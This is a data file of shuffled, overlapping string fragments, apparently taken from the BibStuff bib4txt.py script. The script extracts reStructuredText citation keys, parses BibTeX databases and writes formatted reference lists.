"a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire",
"bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ == '__main__':",
"a sort-key on which to base the sorting :note: Sorting is style dependent---e.g.,",
"print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making",
"- the keys for the citations referenced - a sort-key on which to",
"text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without",
"file %s already exists: Use -n option to nuke (overwrite) this file. PLEASE",
"except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec =",
"<NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_)",
":note: Now cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager",
"ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\",",
"SimpleParse (binaries available!) - BibStuff (which you should have if you have this)",
"2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib)",
"add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import",
"standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import",
"fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings",
"mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile =",
"# note that the standard separator for multiple keys in one citation reference",
"file. You can then include this in your reST document with an ``include``",
"_usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n",
"default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style",
"for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into an",
"open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if",
"See bib4txt.py -h for help. \"\"\" #set default input and output _infile =",
"-f option to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([",
"have this) The source text file should include citation references in reStructuredText format:",
"args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line option #TODO:",
"references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\")",
"infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography",
"to be written to a separate file. You can then include this in",
"if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file",
"added to the end of the file. A slight modification of the reStructuredText",
"\"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE",
"``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by bib4txt.",
"a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file",
"grammar into an object for scanning reST files for citation references. - Uses",
"read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string:",
"if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default:",
"#local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack",
"that the standard separator for multiple keys in one citation reference is a",
"SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST files",
"document, if desired if not citations_only: result = cite_processor.__repr__() + result return result+'\\n'",
"try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept",
"handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create",
"(an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list",
"BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser =",
"action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The",
"= style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src",
".. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext",
"help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2:",
"substituted for the citation keys. In this case, the reference list is added",
"which to base the sorting :note: Sorting is style dependent---e.g., might sort entries",
"logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the",
"else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to",
"#import from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger =",
"<NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO:",
"default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0,",
"to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation",
"sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in the associate",
"file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\",",
"bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not",
"_outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string =",
"parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib",
"\".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a style by filename\")",
"print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles",
"= ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar cite_parser",
"1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document,",
"\"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec",
"-n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile)",
":contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows",
"references from the input document. - Outputs a sorted list of citation definitions,",
"higher - SimpleParse (binaries available!) - BibStuff (which you should have if you",
"dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\",",
"the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in",
"= cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def",
"bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\")",
"workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file",
"for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg =",
"ebnf_sp except ImportError: #hack to allow user to run without installing scriptdir =",
"keys. In this case, the reference list is added to the end of",
"= \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import",
".bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError:",
"imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a",
"brackets, followed by an underscore. Citation keys cannot be all digits. The source",
"bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to",
"citation references substituted for the citation keys. In this case, the reference list",
"from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some",
"entire document, if desired if not citations_only: result = cite_processor.__repr__() + result return",
"Interacts with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: -",
"../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ###################",
"if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec =",
"from the input document. - Outputs a sorted list of citation definitions, to",
"your reST document with an ``include`` directive. How it works: - Uses SimpleParse_",
"action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify",
"http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__",
".. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ =",
"the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore",
"SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib files.",
"style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to",
"\"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\",",
"-s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename:",
"action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False,",
"grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts",
"# bibfile_processor # note that the standard separator for multiple keys in one",
"make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations and",
"= \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o",
"style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout) if args.outfile: if",
"do so need: - the keys for the citations referenced - a sort-key",
"style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\")",
"references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\",",
"\"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is also associated with",
"style based on `stylefile` command-line option #TODO: add error handling for unknown styles",
"parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor =",
"logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from",
"and will be recognized by bib4txt. - Comma separted multiple keys are permitted",
"citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets,",
"!= \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the -s option.\")",
"recommended to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename",
"bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the bibfile_processor",
"standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage)",
"this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w')",
"(binaries available!) - BibStuff (which you should have if you have this) The",
"_EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\"",
":license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt",
"#import dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles,",
"is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation manager",
"= {} #work around Python 2 exec vs Python 3 exec exec(str2exec, {},",
":note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note:",
"bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill",
"in stylename: bib4txt_logger.warn(\"use the -f option to pass a style by filename\") stylename",
"open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile",
"Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is",
"bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import",
"IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool.",
"be all digits. The source document can be output with formatted citation references",
"= ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation",
"= os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f",
"for reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX or",
"experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to",
"simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor = bibfile.BibFile()",
":author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see",
"make a sorted entry list. To do so need: - the keys for",
":note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME>",
"\"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation manager to handle",
"+ result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings",
"\" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style",
"bibliography\"\"\" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager')",
"in brackets, followed by an underscore. Citation keys cannot be all digits. The",
"#hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir =",
"definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend",
"style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile`",
"around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style =",
"(.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX",
"parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO",
"by bib4txt. - Comma separted multiple keys are permitted in a cite: e.g.,",
"In this case, the reference list is added to the end of the",
"%(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\"",
"messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire",
"by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files",
"encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile,",
"# CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style,",
"parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\",",
"default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style",
"\"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names =",
":copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database",
"DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output",
"is *not* legal reST. The intent is for the formatted references to be",
"cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy",
"if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did",
") #import a bibliography style based on `stylefile` command-line option #TODO: add error",
"http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an underscore. Citation",
"type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\",",
"Now cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager which",
"\" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) )",
"allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0,",
"bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object",
"create CiteRefProcessor object to process cites during src parsing # (and associate it",
"dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp",
"`taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist =",
"is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor)",
"keys. It is also associated with citation_manager which holds the bibliography, so we",
"so need: - the keys for the citations referenced - a sort-key on",
"the citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys =",
"help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO",
"currently recommended to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else:",
"outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based",
"\"\"\" # open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile)",
"option to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script",
"the -f option to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info(",
"2 did not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot",
"keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST.",
"Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which",
"dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\",",
"output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite:",
"logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar,",
"#set default input and output _infile = sys.stdin _outfile = sys.stdout from argparse",
"stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass",
"from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage:",
"references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed",
"can make a sorted entry list. To do so need: - the keys",
"vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as",
"files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document.",
"ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on",
"unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround",
"a sorted entry list. To do so need: - the keys for the",
"sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile = open(args.infile,",
"end of the file. A slight modification of the reStructuredText ``cite`` directive is",
"stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output",
"bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only =",
"{}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output",
"to the end of the file. A slight modification of the reStructuredText ``cite``",
"fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def",
"The source document can be output with formatted citation references substituted for the",
"section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by",
"PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read",
"multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal",
"based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to",
"associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ ..",
"= citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only: result",
"dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen",
"bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings )",
"http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple",
"(ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist",
"database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No",
"\"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib,",
"sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in the",
"document with an ``include`` directive. How it works: - Uses SimpleParse_ to convert",
"pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style",
"2 exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import",
"stylename: bib4txt_logger.warn(\"use the -f option to pass a style by filename\") stylename =",
"[options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser",
"#make the citation definitions for a list of References bib4txt_logger.info('make citations') result =",
"def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default input",
"action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\",",
"en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard",
"default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging",
"_`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+'",
"as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join(",
"_SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\"",
"INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation",
"= logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import bibfile,",
"bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file",
"not citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds added newline",
"args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen",
"ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when this file",
"citations and the bibliography\"\"\" #first: create a citation manager to handle the bibfile(s)",
"outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\",",
"Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0])",
"a bibliography style based on `stylefile` command-line option #TODO: add error handling for",
"and not args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists: Use",
"the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with",
"dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files",
"in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__",
":note: Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the",
"style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\")",
"substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\",",
"of the reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted.",
"should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed",
"the citation keys. In this case, the reference list is added to the",
"entry list. To do so need: - the keys for the citations referenced",
"sort entries on citation_rank. \"\"\" #set the citation manager citekeys to all found",
"did not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open:",
"else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser",
"bibliography style based on `stylefile` command-line option #TODO: add error handling for unknown",
"to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args",
"is currently recommended to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0]",
"this) The source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations",
"(2008) legal in reST and will be recognized by bib4txt. - Comma separted",
"# style # bibfile_processor # note that the standard separator for multiple keys",
"bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import",
"- Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This",
"reST and will be recognized by bib4txt. - Comma separted multiple keys are",
"from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user",
"associated with citation_manager which holds the bibliography, so we can make a sorted",
"file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError:",
"(and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third:",
"action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\",",
"except ImportError: #hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__))",
"Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST",
"a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\"",
